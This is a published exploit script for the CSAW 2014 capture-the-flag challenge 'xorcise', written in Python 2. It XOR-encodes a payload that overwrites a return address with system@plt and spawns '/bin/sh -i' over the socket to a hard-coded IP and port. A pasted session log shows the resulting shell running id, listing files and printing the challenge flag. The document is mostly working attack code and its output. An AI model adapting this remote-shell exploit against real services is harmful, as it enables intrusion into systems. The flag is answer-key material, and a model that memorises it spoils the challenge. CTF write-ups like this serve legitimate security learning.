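#!/usr/bin/env python
"""CSAW 2014 CTF -- "xorcise" exploit script, as published.

Written for Python 2: byte strings are plain ``str`` and ``chr``/``ord``
operate on single characters.  ``NullSocket`` comes from the ``nulllife``
helper module, which is not part of this file.
"""
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit


def xor(data, key):
    """Return *data* XORed byte-wise with the cycled *key* and the constant 0x8F.

    Each output byte is ``data[i] ^ key[i % len(key)] ^ 0x8F``; the result has
    the same length as *data*.  An empty *key* raises ``ZeroDivisionError``
    (same as the original loop).  The join-based form replaces the quadratic
    ``o += chr(...)`` accumulation without changing the output.
    """
    # NOTE(review): Python 2 semantics -- on Python 3 this would need bytes handling.
    key_len = len(key)
    return ''.join(
        chr(ord(c) ^ ord(key[i % key_len]) ^ 0x8F) for i, c in enumerate(data)
    )


#overwrite ret decipher x plt@system
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99"

cmd = "/bin/sh -i <&4 >&4 2>&4"
# Pad the payload to a fixed 128-byte buffer; the size is the author's constant.
cmd += "\x00" * (128 - len(cmd))

# Target host/port as given on the page.
s = NullSocket("128.238.66.227", 24001)
# The leading byte 135 is a protocol value the script does not explain here.
s.write(chr(135) + key + xor(cmd, key))
s.interactive()

'''
sh: cannot set terminal process group (134): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
id
uid=1000(xor) gid=1000(xor) groups=1000(xor)
sh-4.3$ ls -la
ls -la
total 44
drwxr-xr-x 2 root root 4096 Sep 20 00:18 .
drwxr-xr-x 3 root root 4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
sh-4.3$ cat flag.txt
ceat flag.txt
flag{code_exec>=crypto_break}
sh-4.3$ exit
exit
exit
*** Connection closed by remote host ***
'''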